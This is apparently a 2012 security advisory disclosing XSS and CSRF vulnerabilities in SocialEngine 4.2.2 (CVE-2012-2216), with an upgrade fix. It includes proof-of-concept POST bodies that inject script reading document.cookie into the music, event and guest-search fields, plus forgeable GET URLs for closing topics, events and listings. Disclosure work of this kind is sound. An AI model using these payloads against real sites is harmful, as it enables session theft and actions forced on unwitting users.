143 lines
No EOL
4.2 KiB
Text
143 lines
No EOL
4.2 KiB
Text
Social Engine 4.2.2 Multiples Vulnerabilities
|
|
Earlier versions are also possibly vulnerable.
|
|
|
|
INFORMATION
|
|
|
|
Product: Social Engine 4.2.2
|
|
Remote-Exploit: yes
|
|
Vendor-URL: http://www.socialengine.net/
|
|
Discovered by: Tiago Natel de Moura aka "i4k"
|
|
Discovered at: 10/04/2012
|
|
CVE Notified: 10/04/2012
|
|
CVE Number: CVE-2012-2216
|
|
|
|
OVERVIEW
|
|
|
|
Social Engine versions 4.2.2 is vulnerable to XSS and CSRF.
|
|
|
|
INTRODUCTION
|
|
|
|
SocialEngine is a PHP-based white-label social networking service
|
|
platform, that provides features similar to a social network on a user's
|
|
website. Main features include administration of small-to-mid scale
|
|
social networks, some customization abilities, unencrypted code,
|
|
multilingual capability, and modular plugin/widget compatibility. There
|
|
is a range of templates and add-ons available to extend the basic
|
|
features already included in the SocialEngine core.
|
|
|
|
VULNERABILITY DESCRIPTION
|
|
|
|
== Persistent XSS in music upload. ==
|
|
|
|
CWE-79: http://cwe.mitre.org/data/definitions/79.html
|
|
The software does not neutralize or incorrectly neutralizes
|
|
user-controllable input before it is placed in output that is
|
|
used as a web page that is served to other users.
|
|
|
|
Proof Of Concept:
|
|
POST http://localhost/index.php/music/create
|
|
|
|
POST data without form-data enctype:
|
|
title=<script>alert(document.cookie);</script>&description=teste
|
|
&search=1&auth_view=everyone&MAX_FILE_SIZE=8388608&filename=
|
|
&fancyuploadfileids=15
|
|
|
|
== Persistent XSS in creating events ==
|
|
|
|
POST
|
|
http://localhost/socialengine/socialengine422_trial/index.php/events/create
|
|
|
|
POST data without form-data enctype:
|
|
title=teste XSS 3&description=teste XSS 3&starttime[date]=4/9/2012&
|
|
starttime[hour]=1&starttime[minute]=0&starttime[ampm]=AM&endtime[date]=4/12/2012
|
|
&endtime[hour]=1&endtime[minute]=0&endtime[ampm]=AM&host=teste
|
|
&location=<script>alert(document.cookie);</script>&MAX_FILE_SIZE=8388608&
|
|
photo=&category_id=0&search=&search=1&approval=&auth_invite=&auth_invite=1&
|
|
auth_view=everyone&auth_comment=everyone&auth_photo=everyone&submit=
|
|
|
|
== Reflected XSS in search form of events area. ==
|
|
|
|
Direct javascript injected:
|
|
POST http://localhost/index.php/widget/index/content_id/644
|
|
|
|
format=html&subject=event_1&search=';alert(document.cookie);var a = '
|
|
|
|
Proof of Concept:
|
|
- - Go to URL: /index.php/event/$EVENT_ID
|
|
- - Click on the "Guests"
|
|
- - Click in "Search guests" form
|
|
- - Submit: ';alert(document.cookie); var a = '
|
|
|
|
You will see your PHPSESSID in the alert.
|
|
|
|
== Multiples CSRF vulnerabilities ==
|
|
|
|
CWE-352: http://cwe.mitre.org/data/definitions/352.html
|
|
The web application does not, or can not, sufficiently verify whether
|
|
a well-formed, valid, consistent request was intentionally provided by
|
|
the user who submitted the request.
|
|
|
|
A CSRF in the plugin "Forum" allows forcing the owner of the event to do
|
|
some
|
|
activities such as:
|
|
|
|
Close a topic:
|
|
GET /index.php/forums/topic/4/example-topic/close/close/1
|
|
|
|
Open a topic:
|
|
GET /index.php/forums/topic/4/example-topic/close/close/0
|
|
|
|
A CSRF in the plugin "Event" allows forcing the owner of the event to do
|
|
some
|
|
activities such as:
|
|
|
|
Close the event:
|
|
GET /index.php/events/topic/close/close/1/event_id/2/topic_id/2
|
|
|
|
Open the event:
|
|
GET /index.php/events/topic/close/close/0/event_id/2/topic_id/2
|
|
|
|
"Watch Topic":
|
|
GET /index.php/events/topic/watch/watch/1/event_id/2/topic_id/2
|
|
|
|
"Stop Watching Topic":
|
|
GET /index.php/events/topic/watch/watch/0/event_id/2/topic_id/2
|
|
|
|
A CSRF in the plugin "Classifieds" allows forcing the owner of the event
|
|
to do
|
|
some activities such as:
|
|
|
|
Open the classified listing:
|
|
GET /index.php/classifieds/close/1/closed/0
|
|
|
|
Close the classified listing:
|
|
GET /index.php/classifieds/close/1/closed/1
|
|
|
|
VERSIONS AFFECTED
|
|
|
|
Tested with version 4.2.2 but earlier versions are possibly vulnerable.
|
|
|
|
SOLUTION
|
|
|
|
Upgrade to Social Engine 4.2.4.
|
|
|
|
NOTES
|
|
|
|
|
|
The Common Vulnerabilities and Exposures (CVE) project has assigned the
|
|
name CVE-2012-2216 to this issue. This is a candidate for inclusion in
|
|
the CVE list (http://cve.mitre.org), which standardizes names for
|
|
security problems.
|
|
CREDITS
|
|
|
|
Tiago Natel de Moura aka "i4k"
|
|
SEC+ Information Security Company - http://www.secplus.com.br/
|
|
BugSec Security Team - http://bugsec.googlecode.com/
|
|
|
|
--
|
|
Tiago Natel de Moura
|
|
IT Security Consultant
|
|
http://www.linkedin.com/in/tiagonatel
|
|
http://www.secplus.com.br/
|
|
http://github.com/tiago4orion
|
|
http://code.google.com/p/bugsec |